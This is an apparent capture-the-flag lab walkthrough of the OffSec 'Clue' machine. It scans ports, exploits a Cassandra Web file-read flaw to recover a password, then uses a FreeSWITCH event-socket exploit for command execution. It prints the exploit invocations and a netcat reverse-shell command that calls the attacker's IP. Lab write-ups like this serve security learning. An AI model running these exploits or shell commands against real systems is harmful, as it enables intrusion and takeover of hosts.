Skip to main content

Clue Walkthrough

Platform: Offsec | PG Practice
Difficulty: Very Hard
OS: Linux
Author: Pawan Kumar (Vulntricks)

🛰️ 1. Reconnaissance

Quick Scan using RustScan

└─$ rustscan -a $IP
PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 61
80/tcp   open  http         syn-ack ttl 61
139/tcp  open  netbios-ssn  syn-ack ttl 61
445/tcp  open  microsoft-ds syn-ack ttl 61
3000/tcp open  ppp          syn-ack ttl 61
8021/tcp open  ftp-proxy    syn-ack ttl 61

Nmap Scanning

After I discovery of ports let's check for the service versions:

─$ nmap -sV -sC -p22,80,139,445,3000,8021 $IP -v -oN nmap_tcp

PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp   open  http             Apache httpd 2.4.38
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp  open  netbios-ssn      Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn      Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3000/tcp open  http             Thin httpd
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: 68089FD7828CD453456756FE6E7C4FD8
|_http-title: Cassandra Web
|_http-server-header: thin
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket
Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m36s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: clue
|   NetBIOS computer name: CLUE\x00
|   Domain name: pg
|   FQDN: clue.pg
|_  System time: 2025-07-05T06:53:33-04:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-07-05T10:53:29
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Eumerating port 80

Apache httpd 2.4.38 -->

Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation          | linux/local/46676.php

Could be vulnerable but who knows..

Looking through the website , Not much to look at as I don't have permission alt text

Let's enumearte directory little further :

─$ gobuster dir --url $URL --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

Found Nothing...

Enumearting SMB

Taking a quick peek on the SMB shares:

─$ smbclient -L \\\\$IP\\

alt text

looking into it further and looks like we have 2 folder and to me looks like users , So I'll save it for my future.

alt text

looking into it and wasting some time , It is not a user 😅

Enumerating Port 3000

Service says Thin httpd , digging a little found this is a Ruby Web server, So let's have a look into this server,

alt text This is Cassandra web server , the one that we saw earlier in the SMB share.. Interesting !! I think we can do something..

Meanwhile I looked into vulnerabilities of Cassandra

─$ searchsploit cassandra 
Cassandra Web 0.5.0 - Remote File Read                                                         | linux/webapps/49362.py

I am not sure about the exact version, Just a try on this. Hit and Try!!

Success

And the exploit worked for me, So what can be done now ? Looking into the exploit for details exploit_details

Looks like important files to me.. let's see :

File /proc/sched_debug

─$ python3 49362.py -p 3000 192.168.190.240 /proc/sched_debug

Looks like tasks and PID and some more info :

PID

Now next file from the exploit is /proc/<cass-web-pid>/cmdline

so If you see the result of the fist command we see a PID for cassandra
cassandra_PID

So when we put this PID in the file name as per exploit :

─$ python3 49362.py -p 3000 192.168.190.240 /proc/930/cmdline

pass_for_cassie

BINGO !! we found some sort of password for user cassie.. But no luck with SSH access. Not the ssh pass.
Let's figure out where we can use the password.

Enumearting FreeSwitch 8021

So looked for this and found an exploit
freeswitch_exploit

Used the found password from cassandra in the exploit for testing because default password did not work.
exploit_modify

but failed again 🥲 So what's the password ? we can try finding the password if we know where password is stored :

freeswitch_pass_location

This one failed Too...

Free Switch event socket pass location

This time it worked.. Found the password of the eevent socket now.. alt text

And execute the exploit with this password .. it worked ..

command execution

We now have command execution on the server....

🚪 2. Initial Access

Since we already have command execution , Then we execute commands:

checking if I can execute some commands

└─$ python3 47799.py 192.168.190.240 'which nc'  
Authenticated
Content-Type: api/response
Content-Length: 12

/usr/bin/nc

And then I confirm where is bash

└─$ python3 47799.py 192.168.190.240 'which bash'
Authenticated
Content-Type: api/response
Content-Length: 14

/usr/bin/bash

once confirmed I mix it up..

 python3 47799.py 192.168.190.240 'nc -e /usr/bin/bash 192.168.45.178 80'     
Authenticated

And got the revese shell..

─$ sudo nc -nvlp 80           
[sudo] password for kali: 
listening on [any] 80 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.190.240] 47214
ls
bin

Getting tty shell

tty shell

📦 2. Post-Exploitation Enumeration

🔗 References